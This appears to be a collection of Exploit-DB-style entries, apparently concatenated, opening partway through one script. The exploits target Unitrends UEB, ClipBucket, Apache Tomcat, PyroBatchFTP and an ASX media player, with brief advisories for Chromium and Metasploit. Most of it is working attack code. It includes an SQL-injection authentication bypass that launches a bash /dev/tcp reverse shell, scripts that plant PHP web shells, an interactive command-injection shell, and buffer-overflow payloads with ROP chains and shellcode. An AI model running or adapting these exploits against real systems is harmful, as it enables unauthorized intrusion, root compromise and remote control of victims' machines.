print "[+] attempting to connect to xinetd on {0}:{1}".format(RHOST, str(XINETDPORT))
try:
s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s1.connect((RHOST,XINETDPORT))
except:
print "[!] Failed to connect!"
exit()
data = s1.recv(4096)
bpd_port = int(data[-8:-3])
print "[+] Connected! Cmd output will come back on {}:{}".format(RHOST, str(bpd_port))
print "[+] Connecting to bpdserverd on {}:{}".format(RHOST, str(bpd_port))
try:
s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s2.connect((RHOST, bpd_port))
except:
print "[!] Failed to connect!"
s1.close()
exit()
print "[+] Connected! Sending the following cmd to {0}:{1}".format(RHOST,str(XINETDPORT))
print "[+] '{0}'".format(cmd)
if (len(cmd) > 240):
print "[!] This command is long; this might not work."
print "[!] Maybe try a shorter command..."
cmd_len = chr(len(cmd) + 3)
packet_len = chr(len(cmd) + 23)
packet = '\xa5\x52\x00\x2d'
packet += '\x00' * 3
packet += packet_len
packet += '\x00' * 3
packet += '\x01'
packet += '\x00' * 3
packet += '\x4c'
packet += '\x00' * 3
packet += cmd_len
packet += cmd
packet += '\x00' * 3
s1.send(packet)
print "[+] cmd packet sent!"
print "[+] Waiting for response from {0}:{1}".format(RHOST,str(bpd_port))
data = recv_timeout(s2)
print "[+] Here's the output -> \n\n"
print data
print "[+] Closing ports, exiting...."
s1.close()
s2.close()
# 3. Solution:
# Update to Unitrends UEB 10
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1319
The following PoC bypasses the fix for the issue 1263 (https://bugs.chromium.org/p/project-zero/issues/detail?id=1263)
PoC:
-->
function f() {
let o = {};
for (let i in {xx: 0}) {
for (i of [0]) {
}
print(o[i]);
}
}
f();
# E-DB Note: https://www.alphabot.com/security/blog/2017/java/Apache-Tomcat-RCE-CVE-2017-12617.html
When running on Windows with HTTP PUTs enabled (e.g. via setting the readonly initialisation parameter of the Default to false) it was possible to upload a JSP file to the server via a specially crafted request.
This JSP could then be requested and any code it contained would be executed by the server.
The PoC is like this:
PUT /1.jsp/ HTTP/1.1
Host: 192.168.3.103:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://192.168.3.103:8080/examples/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,zh-CN;q=0.6,zh;q=0.4,zh-TW;q=0.2
Cookie: JSESSIONID=A27674F21B3308B4D893205FD2E2BF94
Connection: close
Content-Length: 26
<% out.println("hello");%>
It is the bypass for CVE-2017-12615
# Exploit Title: ClipBucket PHP Script Remote Code Execution (RCE)
# Date: 2017-10-04
# Exploit Author: Esecurity.ir
# Vendor Homepage: https://clipbucket.com/
# Version: 2.8.3
# Exploit Code By : Meisam Monsef - Email : meisamrce@gmail.com - TelgramID : @meisamrce
# Usage Exploit : exploit.py http://target.com/path/
import sys,os
try:
import requests
except Exception as e:
print 'please install module requests!'
sys.exit()
img = 'temp.jpg'
uploadUrl = "api/file_uploader.php"
h = {'user-agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.96 Safari/537.36'}
def getShell(url):
try:
r = requests.get(url+'cache/1.log',headers=h)
if r.status_code == 200:
return r.content
else:
print 'Sorry site is not vulnerable '
sys.exit()
except Exception as e:
print e
sys.exit()
def exploit(url):
while (1):
cmd = raw_input('$')
if cmd == '' or cmd == 'exit':
break
file_ = {'Filedata': (img, open(img, 'r'),'image/jpg')}
data = {'file_name':'a.jpg;'+cmd+' > ../cache/1.log;a.jpg'}
try:
r = requests.post(url+uploadUrl, files=file_,data=data,headers=h)
if r.status_code == 200:
if '"success":"yes"' in r.content:
print getShell(url)
else:
print 'Sorry site is not vulnerable '
break
else:
print 'Sorry site is not vulnerable '
break
except Exception as e:
print e
break
if not os.path.exists(img):
print 'please create tiny image file name is ' + img
sys.exit()
if len(sys.argv) == 2 :
exploit(sys.argv[1])
else:
print "Usage Exploit : exploit.py http://target.com/path/";
# Exploit Title: Authenticated lowpriv RCE for Unitrends UEB 9.1
# Date: 08/08/2017
# Exploit Authors: Benny Husted, Jared Arave, Cale Smith
# Contact: https://twitter.com/iotennui || https://twitter.com/BennyHusted || https://twitter.com/0xC413
# Vendor Homepage: https://www.unitrends.com/
# Software Link: https://www.unitrends.com/download/enterprise-backup-software
# Version: 9.1
# Tested on: CentOS6
# CVE: CVE-2017-12479
import httplib
import urllib
import ssl
import sys
import base64
import random
import time
import string
import json
from optparse import OptionParser
# Print some helpful words:
print """
###############################################################################
Authenticated lowpriv RCE for Unitrends UEB 9.1
Tested against appliance versions:
[+] 9.1.0-2.201611302120.CentOS6
This exploit utilizes some issues in UEB9 session handling to place a
php exec one liner in the webroot of the appliance.
Session tokens looks like this:
djA6NmM0ZWMzYTEtZmYwYi00MTIxLTk3YzYtMjQzODljM2EyNjY1OjE6L3Vzci9icC9sb2dzLmRpci9ndWlfcm9vdC5sb2c6MA==
and decodes to this:
LOG_LVL ----,
v --- UUID ----------------------- v v -- LOG_DIR -----------v v
v0:6c4ec3a1-ff0b-4121-97c6-24389c3a2665:1:/usr/bp/logs.dir/gui_root.log:0
The general steps that are followed by this poc are:
1. Authenticate as a low priv user and receive an auth token.
2. Modify the LOG_DIR field to point to a directory in the web root
with apache user write access, and make a request to an arbitrary resource.
This should touch a new file at the desired location.
3. Replace the UUID token in this auth token with a php shell_exec on liner,
and modify the LOG_LVL parameter to a value of 5, which will ensure
that the UUID is reflected into the log file.
4. Issue a final request, to generate a shell.php file with a single shell_exec.
This step is not strictly necessary.
###############################################################################
"""
# Disable SSL Cert validation
if hasattr(ssl, '_create_unverified_context'):
ssl._create_default_https_context = ssl._create_unverified_context
# Parse command line args:
usage = "Usage: %prog -r <appliance_ip> -u <username> -p <password>\n"\
parser = OptionParser(usage=usage)
parser.add_option("-r", '--RHOST', dest='rhost', action="store",
help="Target host w/ UNITRENDS UEB installation")
parser.add_option("-u", '--username', dest='username', action="store",
help="User with any amount of privilege on unitrends device")
parser.add_option("-p", '--password', dest='password', action="store",
help="password for this user")
(options, args) = parser.parse_args()
if not options.rhost:
parser.error("[!] No remote host specified.\n")
elif options.rhost is None or options.username is None or options.password is None:
parser.print_help()
sys.exit(1)
RHOST = options.rhost
username = options.username
password = options.password
################################################################
# REQUEST ONE: GET A UUID.
################################################################
url1 = '/api/login'
a = {"username" : username,
"password" : password}
post_body = json.dumps(a)
headers1 = {'Host' : RHOST}
print "[+] Attempting to log in to {0}, {1}:{2}".format(RHOST, username, password)
conn = httplib.HTTPSConnection(RHOST, 443)
conn.set_debuglevel(0)
conn.request("POST", url1, post_body, headers=headers1)
r1 = conn.getresponse()
################################################################
# BUILD THE AUTH TOKENS THAT WE'LL USE IN AN ATTACK.
################################################################
parsed_json = json.loads(r1.read())
if 'auth_token' not in parsed_json:
print "[!] Didn't receive an auth token. Bad creds?"
exit()
auth_encoded = parsed_json['auth_token']
auth_decoded = base64.b64decode(auth_encoded)
uuid = auth_decoded.split(':')[1]
ssid = auth_decoded.split(':')[2]
# We'll place our command shell in /var/www/html/tempPDF, since apache
# has rw in this dir.
log_dir = "/var/www/html/tempPDF/"
log_file = ''.join(random.choice(string.ascii_lowercase) for _ in range(5)) + '.php'
log_lvl = "5"
shell = "<?php echo shell_exec($_GET['cmd']);?> >"
auth_mod1 = "v0:{0}:{1}:{2}{3}:{4}".format(uuid, ssid, log_dir, log_file, log_lvl)
auth_mod2 = "v0:{0}:{1}:{2}{3}:{4}".format(shell, ssid, log_dir, log_file, log_lvl)
auth_mod1 = base64.b64encode(auth_mod1)
auth_mod2 = base64.b64encode(auth_mod2)
url2 = '/api/summary/current/'
################################################################
# REQUEST 2: PUT A FILE
################################################################
print "[+] Making a request to place log to http://{0}/tempPDF/{1}".format(RHOST, log_file)
headers2 = {'Host' : RHOST,
'AuthToken' : auth_mod1}
# touch the file
conn.request("GET", url2, headers=headers2)
r2 = conn.getresponse()
print "[+] Making request to reflect shell_exec php to {0}.".format(log_file)
headers3 = {'Host' : RHOST,
'AuthToken' : auth_mod2}
# make the first command
time.sleep(.5)
conn.request("GET", url2, headers=headers3)
conn.close()
# optional cleanup time
print "[+] Making a request to generate clean shell_exec at http://{0}/tempPDF/shell.php".format(RHOST)
url4 = '/tempPDF/' + log_file
url4 += '?cmd=echo+-e+"<?php%20echo%20shell_exec(\$_GET[%27cmd%27]);?>"+>+shell.php'
conn1 = httplib.HTTPSConnection(RHOST, 443)
conn1.request("GET", url4, headers=headers2)
r3 = conn1.getresponse()
conn1.close()
url5 = "/tempPDF/shell.php"
print "[+] Checking for presence of http://{0}{1}".format(RHOST, url5)
headers3 = {'Host' : RHOST}
conn2 = httplib.HTTPSConnection(RHOST, 443)
conn2.request("GET", url5, headers=headers2)
r3 = conn2.getresponse()
if r3.status == 200:
print "[+] Got a 200 back. We did it."
print "[+] Example cmd: http://{0}{1}?cmd=id".format(RHOST, url5)
else:
print "Got a {0} back. Maybe this didn't work.".format(r3.status)
print "Try RCE here http://{0}/tempPDF/{1}?cmd=id".format(RHOST, log_file)
conn2.close()
# 3. Solution:
# Update to Unitrends UEB 10
Sources:
https://siberas.de/blog/2017/10/05/exploitation_case_study_wild_pool_overflow_CVE-2016-3309_reloaded.html
https://github.com/siberas/CVE-2016-3309_Reloaded
Exploits for the recently-patched win32kfull!bFill vulnerability. Executing the Palette or Bitmap exploit will give you SYSTEM privileges on the affected system. The exploits should work fine on Windows 10 x64 with Creators Update, build 15063.540 (latest version of Win10 before the release of Microsoft's September Updates).
The Visual Studio solution contains three exploits:
CVE-2016-3309_Reloaded_Bitmaps: Exploit using the Bitmaps technique
CVE-2016-3309_Reloaded_Palettes: Exploit using the Palettes technique
CVE-2016-3309_Reloaded_Deadlock: POC exploit showcasing the system deadlock which happens due to improved Handle validation
We also published a blog post (https://siberas.de/blog/2017/10/05/exploitation_case_study_wild_pool_overflow_CVE-2016-3309_reloaded.html) which goes into detail about the exploitation of this "wild" Pool-based overflow.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42960.zip
# Exploit Title: Unauthenticated root RCE for Unitrends UEB 9.1
# Date: 08/08/2017
# Exploit Authors: Cale Smith, Benny Husted, Jared Arave
# Contact: https://twitter.com/iotennui || https://twitter.com/BennyHusted || https://twitter.com/0xC413
# Vendor Homepage: https://www.unitrends.com/
# Software Link: https://www.unitrends.com/download/enterprise-backup-software
# Version: 9.1
# Tested on: CentOS6
# CVE: CVE-2017-12478
import httplib
import urllib
import ssl
import random
import sys
import base64
import string
from optparse import OptionParser
# Print some helpful words:
print """
###############################################################################
Unauthenticated root RCE for Unitrends UEB 9.1
Tested against appliance versions:
[+] 9.1.0-2.201611302120.CentOS6
This exploit leverages a sqli vulnerability for authentication bypass,
together with command injection for subsequent root RCE.
To use the exploit as written, make sure you're running a reverse
shell listener somewhere, using a command like:
$ nc -nlvp 1234
Then, just specify the ip and port of the remote listener in the
exploit command. Alternatively, modify this exploit to contain a
command of your choosing by modifying the 'cmd' variable below.
###############################################################################
"""
# Disable SSL Cert validation
if hasattr(ssl, '_create_unverified_context'):
ssl._create_default_https_context = ssl._create_unverified_context
# Parse command line args:
usage = "Usage: %prog -r <appliance_ip> -l <listener_ip> -p <listener_port>\n"\
" %prog -c 'touch /tmp/foooooooooooo'"
parser = OptionParser(usage=usage)
parser.add_option("-r", '--RHOST', dest='rhost', action="store",
help="Target host w/ UNITRENDS UEB installation")
parser.add_option("-l", '--LHOST', dest='lhost', action="store",
help="Host listening for reverse shell connection")
parser.add_option("-p", '--LPORT', dest='lport', action="store",
help="Port on which nc is listening")
parser.add_option("-c", '--cmd', dest='cmd', action="store",
help="Run a custom command, no reverse shell for you.")
(options, args) = parser.parse_args()
if options.cmd:
if (options.lhost or options.lport):
parser.error("[!] Options --cmd and [--LHOST||--LPORT] are mututally exclusive.\n")
elif not options.rhost:
parser.error("[!] No remote host specified.\n")
elif options.rhost is None or options.lhost is None or options.lport is None:
parser.print_help()
sys.exit(1)
RHOST = options.rhost
LHOST = options.lhost
LPORT = options.lport
if options.cmd:
cmd = options.cmd
else:
cmd = 'bash -i >& /dev/tcp/{0}/{1} 0>&1 &'.format(LHOST, LPORT)
url = '/api/storage/'
# Here, a SQLi string overrides the uuid, providing auth bypass.
# We'll need to base64 encode before sending...
auth = base64.b64encode("v0:b' UNION SELECT -1 -- :1:/usr/bp/logs.dir/gui_root.log:0")
params = urllib.urlencode({'auth' : auth})
params = """{{"type":4,"name":"aaaaaaaa","usage":"archive","properties":{{"username":"km","password":"km","port":"445","hostname":"asdf.com","protocol":"cifs","share_name":"`{0}`"}}}}""".format(cmd)
headers = {'Host' : RHOST,
'Content-Type' : 'application/json',
'X-Requested-With' : 'XMLHttpRequest',
'AuthToken' : auth }
# Establish an HTTPS connection and send the payload.
conn = httplib.HTTPSConnection(RHOST, 443)
conn.set_debuglevel(1)
print """
[+] Sending payload to remote host [https://{0}]
[+] Here's some debug info:
""".format(RHOST)
conn.request("POST", url, params, headers=headers)
r1 = conn.getresponse()
print ""
print "[+] Request sent. Maybe your command was executed?"
print ""
# Print response, for debug purposes.
print r1.status, r1.reason
print r1.read()
# 3. Solution:
# Update to Unitrends UEB 10
#!/usr/bin/python
print "PyroBatchFTP Local Buffer Overflow (SEH) Server"
#Author: Kevin McGuigan @_h3xagram
#Author Website: https://www.7elements.co.uk
#Vendor Website: https://www.emtech.com
#Date: 07/10/2017
#Version: 3.17
#Tested on: Windows 7 32-bit
#CVE: CVE-2017-15035
import socket
import sys
buffer="A" * 2292 + "B" * 4 + "C" * 4 + "D" * 800
port = 21
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("0.0.0.0", port))
s.listen(5)
print("[+] FTP server started on port: "+str(port)+"\r\n")
except:
print("[+] Failed to bind the server to port: "+str(port)+"\r\n")
while True:
conn, addr = s.accept()
conn.send('220 Welcome to PyoBatchFTP Overflow!\r\n')
print(conn.recv(1024))
conn.send("331 OK\r\n")
print(conn.recv(1024))
conn.send('230 OK\r\n')
print(conn.recv(1024))
conn.send('220 "'+buffer+'" is current directory\r\n')
# Exploit Title: CSRF
# Date: Wed, Aug 30, 2017
# Software Link: https://www.metasploit.com/
# Exploit Author: Dhiraj Mishra
# Contact: http://twitter.com/mishradhiraj_
# Website: http://datarift.blogspot.in/
# CVE: CVE-2017-15084 (R7-2017-22)
# Category: Metasploit Pro, Express, Ultimate, and Community
1. Description
Metasploit Pro, Express, Ultimate, and Community can encounter an issue of cross site request forgery (also known as one-click attack and is abbreviated as CSRF or XSRF), which is a type of malicious exploit of a website where unauthorized commands are transmitted from a user that the web application trusts. A CSRF attack attempts to exploit the trust that a specific website has in a user's browser.
2. Proof of concept
The MSF did not protect the logout form with csrf token, therefore i can logout any user by sending this url https://Metasploit-Server-IP:3790/logout
Here's an attack vector:
1) Set up a honeypot that detects MSF scans/attacks (somehow).
2) Once I get a probe, fire back a logout request.
3) Continue to logout the active user forever.
It's less damaging than a traditional "hack back" but is sure to irritate the local red team to no end. It's essentially a user DoS. This attack may have been useful as a denial of service against Metasploit instances, allowing an attacker to prevent normal Metasploit usage.
3. Rapid7 Security Bulletin
https://blog.rapid7.com/2017/10/06/vulnerabilities-affecting-four-rapid7-products-fixed/
import struct,sys
head ='''<ASX version="3.0">
<Entry>
<REF HREF="mms://site.com/ach/music/smpl/LACA-05928-002-tes_'''
#offset 17375
junk = "A" *17375
#0x1003df8e
#0x774e1035
EIP="\x36\x10\x4e\x77"
adjust="A" *4
def create_rop_chain():
rop_gadgets = [
0x73dd5dce, # POP EAX # RETN [MFC42.DLL]
0x5d091368, # ptr to &VirtualProtect() [IAT COMCTL32.dll]
0x7608708e, # MOV EAX,DWORD PTR DS:[EAX] # RETN [MSVCP60.dll]
0x73dd40f1, # XCHG EAX,ESI # RETN [MFC42.DLL]
0x7c96feb7, # POP EBP # RETN [ntdll.dll]
0x7608fcec, # & push esp # ret [MSVCP60.dll]
0x01c395d4, # POP EAX # RETN [MSA2Mcodec00.dll]
0xfffffdff, # Value to negate, will become 0x00000201
0x77d74960, # NEG EAX # RETN [USER32.dll]
0x7ca485b4, # XCHG EAX,EBX # RETN [SHELL32.dll]
0x01d64827, # POP EAX # RETN [msvos.dll]
0xffffffc0, # Value to negate, will become 0x00000040
0x77d74960, # NEG EAX # RETN [USER32.dll]
0x71ab9b46, # XCHG EAX,EDX # RETN [WS2_32.dll]
0x1003fd11, # POP ECX # RETN [MSA2Mfilter03.dll]
0x77da1d04, # &Writable location [USER32.dll]
0x01d34691, # POP EDI # RETN [MSA2Mctn01.dll]
0x76091182, # RETN (ROP NOP) [MSVCP60.dll]
0x7d7da123, # POP EAX # RETN [WMVCore.DLL]
0x90909090, # nop
0x77195015, # PUSHAD # RETN [OLEAUT32.dll]
]
return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
rop_chain = create_rop_chain()
#msfvenom -a x86 --platform Windows -p windows/exec cmd=calc.exe -f python -b "\x00\x0a\x0d EXITFUNC=seh
#badcharacters "\x00\x0a\x0d"
buf = ""
buf += "\xda\xd6\xba\xf5\xa4\x32\xf4\xd9\x74\x24\xf4\x5d\x31"
buf += "\xc9\xb1\x31\x83\xc5\x04\x31\x55\x14\x03\x55\xe1\x46"
buf += "\xc7\x08\xe1\x05\x28\xf1\xf1\x69\xa0\x14\xc0\xa9\xd6"
buf += "\x5d\x72\x1a\x9c\x30\x7e\xd1\xf0\xa0\xf5\x97\xdc\xc7"
buf += "\xbe\x12\x3b\xe9\x3f\x0e\x7f\x68\xc3\x4d\xac\x4a\xfa"
buf += "\x9d\xa1\x8b\x3b\xc3\x48\xd9\x94\x8f\xff\xce\x91\xda"
buf += "\xc3\x65\xe9\xcb\x43\x99\xb9\xea\x62\x0c\xb2\xb4\xa4"
buf += "\xae\x17\xcd\xec\xa8\x74\xe8\xa7\x43\x4e\x86\x39\x82"
buf += "\x9f\x67\x95\xeb\x10\x9a\xe7\x2c\x96\x45\x92\x44\xe5"
buf += "\xf8\xa5\x92\x94\x26\x23\x01\x3e\xac\x93\xed\xbf\x61"
buf += "\x45\x65\xb3\xce\x01\x21\xd7\xd1\xc6\x59\xe3\x5a\xe9"
buf += "\x8d\x62\x18\xce\x09\x2f\xfa\x6f\x0b\x95\xad\x90\x4b"
buf += "\x76\x11\x35\x07\x9a\x46\x44\x4a\xf0\x99\xda\xf0\xb6"
buf += "\x9a\xe4\xfa\xe6\xf2\xd5\x71\x69\x84\xe9\x53\xce\x74"
buf += "\x1b\x6e\xda\xe1\x82\x1b\xa7\x6f\x35\xf6\xeb\x89\xb6"
buf += "\xf3\x93\x6d\xa6\x71\x96\x2a\x60\x69\xea\x23\x05\x8d"
buf += "\x59\x43\x0c\xee\x3c\xd7\xcc\xdf\xdb\x5f\x76\x20"
shellcode="S"*10+buf
print "Length of shellcode is:",len(shellcode)
print "Length of ropchain is:",len(rop_chain)
print"Calculating Garbage:",(26000-17375-4-4-len(shellcode)-len(rop_chain))
garbage= "C" *8303
foot ='''_playlis.wma"/>
</Entry>
</ASX>'''
payload=head+junk+EIP+adjust+rop_chain+shellcode+garbage+foot
fobj = open("exploit.asx","w")
fobj.write(payload)
fobj.close()